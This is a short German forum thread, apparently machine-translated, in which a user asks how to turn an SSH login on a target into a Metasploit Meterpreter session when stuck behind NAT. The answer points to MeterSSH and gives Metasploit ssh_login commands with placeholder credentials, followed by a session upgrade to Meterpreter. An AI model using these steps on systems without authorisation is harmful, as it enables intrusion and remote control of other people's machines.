Meterpreter für SSH-Verbindung

1673
vfjpl

Ich stehe hinter NAT.

Ich kann mich über ssh am Ziel anmelden.

Wie wird diese SSH-Verbindung verwendet metasploit/ gesendet meterpreter?

Ich habe es versucht, shell_to_meterpreteraber es ist fehlgeschlagen, weil ich meinen Port nicht öffnen kann, um mit Reverse-TCP eine Verbindung herzustellen.

Beide Maschinen laufen unter Linux.

0

1 Antwort auf die Frage

0
alexfrancow

Windows:

Sie können versuchen, MeterSSH zu verwenden .

MeterSSH ist eine einfache Methode, um nativen Shellcode in den Speicher zu injizieren und alles über SSH an den Angreifer durch einen SSH-Tunnel zu leiten, der sich in einer einzigen Python-Datei befindet.

Linux:

Sie können das Zusatzmodul von metasploit mit dem Namen ssh_login verwenden:

msf > use auxiliary/scanner/ssh/ssh_login msf auxiliary(ssh_login) > set rhosts 192.168.0.109  msf auxiliary(ssh_login) > set username foo  msf auxiliary(ssh_login) > set password bar msf auxiliary(ssh_login) > exploit 

Konvertieren Sie nun die Befehlsshell durch folgenden Befehl in die Meterpreter-Shell

session –u 1 
Ich habe vergessen zu ergänzen. Beide Maschinen laufen unter Linux. vfjpl vor 6 Jahren 0